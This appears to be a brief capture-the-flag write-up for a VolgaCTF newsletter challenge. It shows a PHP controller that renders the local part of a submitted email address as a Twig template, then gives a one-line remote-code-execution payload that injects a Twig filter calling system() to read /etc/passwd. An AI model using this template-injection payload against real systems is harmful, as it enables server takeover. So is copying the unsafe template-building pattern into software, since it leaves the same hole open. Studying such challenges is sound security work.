Rating: 5.0

Vulnerable function:
```
public function subscribe(Request $request, MailerInterface $mailer)
{
$msg = '';
$email = filter_var($request->request->get('email', ''), FILTER_VALIDATE_EMAIL);
if($email !== FALSE) {
$name = substr($email, 0, strpos($email, '@'));

$content = $this->get('twig')->createTemplate(
"

Hello ${name}.

Thank you for subscribing to our newsletter.

Regards, VolgaCTF Team

"
)->render();

$mail = (new Email())->from('newsletter@newsletter.q.2020.volgactf.ru')->to($email)->subject('VolgaCTF Newsletter')->html($content);
$mailer->send($mail);

$msg = 'Success';
} else {
$msg = 'Invalid email';
}
return $this->render('main.twig', ['msg' => $msg]);
}
```

RCE PoC: `email="{{['cat${IFS}/etc/passwd']|filter('system')}}"@your.domain`